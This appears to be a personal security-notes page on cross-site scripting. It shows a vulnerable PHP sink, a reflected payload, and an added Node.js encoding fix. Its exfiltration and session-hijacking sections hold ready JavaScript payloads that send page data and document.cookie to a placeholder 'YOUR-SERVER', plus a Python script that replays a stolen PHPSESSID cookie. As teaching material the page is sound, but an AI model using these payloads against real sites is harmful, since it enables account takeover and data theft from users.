Cross-Site Scripting (XSS)

Reflected

Vulnerable code

```php
<?php
// $_GET['search'] is concatenated straight into the HTML body with no output encoding
echo '<div><p>Searched string: ' . $_GET['search'] . '</p></div>';
?>
```

The injection

http(s)://HOST/file.php?search=1

Response

```html
<div><p>Searched string: 1</p></div>
```
http(s)://HOST/file.php?search=</p><script>alert()</script><p>

Response

```html
<div><p>Searched string: </p><script>alert()</script><p></p></div>
```
As you can see, the injected code is inserted verbatim into the HTML response of the website. Breaking the payload down:

</p> -> closes the current <p> tag.
<script> -> opens a script tag, so what follows is executed as JavaScript.
alert() -> function that pops an alert box (the usual proof that script execution was reached).
</script> -> closes the script tag.
<p> -> reopens a <p> tag so the rest of the response is not broken.
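As an added example (not from the original notes), the same sink rebuilt in Node.js: the raw-concatenation renderer beside a version that HTML-encodes the parameter at the point of output, plus a small check that flags output containing tags the template never emits. The function names are this example's own; the PHP equivalent of escapeHtml is htmlspecialchars($s, ENT_QUOTES, 'UTF-8').

```javascript
// Added example, not code from the original page. Rebuilds the reflected
// sink above in Node.js so the vulnerable and hardened output can be compared.

// Encoder for the HTML body / quoted-attribute context: the five characters
// that can terminate text or an attribute value. '&' is handled by the same
// single pass as the others, so nothing gets double-encoded.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Mirrors the page's vulnerable PHP: raw concatenation into the HTML body.
function renderSearchVulnerable(search) {
  return '<div><p>Searched string: ' + search + '</p></div>';
}

// Hardened version: encode for the HTML-body context where the value is output.
function renderSearchSafe(search) {
  return '<div><p>Searched string: ' + escapeHtml(search) + '</p></div>';
}

// Crude check usable in tests or response review: after removing the tags the
// template itself emits, does any other tag remain in the rendered HTML?
function introducesNewTag(html, templateTags = /<\/?(div|p)>/g) {
  return /<[a-z!\/]/i.test(html.replace(templateTags, ''));
}

// Constructed input: the exact payload shown on this page.
const PAYLOAD = '</p><script>alert()</script><p>';

// Convenience wrapper returning both renderings for the same input.
function compare(search) {
  return { vulnerable: renderSearchVulnerable(search), safe: renderSearchSafe(search) };
}
```

compare(PAYLOAD).vulnerable reproduces the response shown above; compare(PAYLOAD).safe renders the payload as literal text inside the paragraph.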

Stored

In this variant, the injected code is stored in the database (e.g. as a comment, name, description, etc.) and is then rendered every time that data is displayed, so it executes for every user who views the page, not just the one who sent it.

Data exfiltration

To exfiltrate data, a receiving server is needed, for example an HTTP server.
Options include ngrok (as a tunnel substitute) and Python's SimpleHTTPServer / http.server.

Exfiltrating basic data

```html
<html>
<script>

// Sends whatever value is placed in EXFILTRATED-DATA to the receiving server
// as the body of a POST request.
const first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send("EXFILTRATED-DATA");

</script>
</html>
```

Exfiltrating other endpoint's data

```html
<html>
<script>

// First request: fetch a page from the target with the victim's browser,
// so it is sent with the victim's cookies.
const first = new XMLHttpRequest();
first.open("GET", "TARGET-SERVER");
first.onreadystatechange = function () {
  if (first.readyState === XMLHttpRequest.DONE) {
    // Second request: forward the result (typically first.responseText)
    // to the receiving server.
    const second = new XMLHttpRequest();
    second.open("POST", "YOUR-SERVER");
    second.send("EXFILTRATED-DATA");
  }
};
first.send();

</script>
</html>
```

Session Hijacking

In a nutshell: stealing the (administrator|authenticated user) session cookie's value and using it.

```html
<html>
<script>

// document.cookie only exposes cookies that are not flagged HttpOnly;
// its value is sent to the receiving server as the POST body.
const first = new XMLHttpRequest();
first.open("POST", "YOUR-SERVER");
first.send(document.cookie);

</script>
</html>
```

```python
import requests

url = ""                 # URL of the application (fill in)
exfiltrated_cookie = ""  # session cookie value received by the server above

cookies = {'PHPSESSID': exfiltrated_cookie}  # Example: the cookie name depends on the application

# The request is sent with the stolen cookie, i.e. as that user's session
r = requests.get(url, cookies=cookies)
```

Filter Bypass

https://owasp.org/www-community/xss-filter-evasion-cheatsheet
ITasahobby
Last modified 1yr ago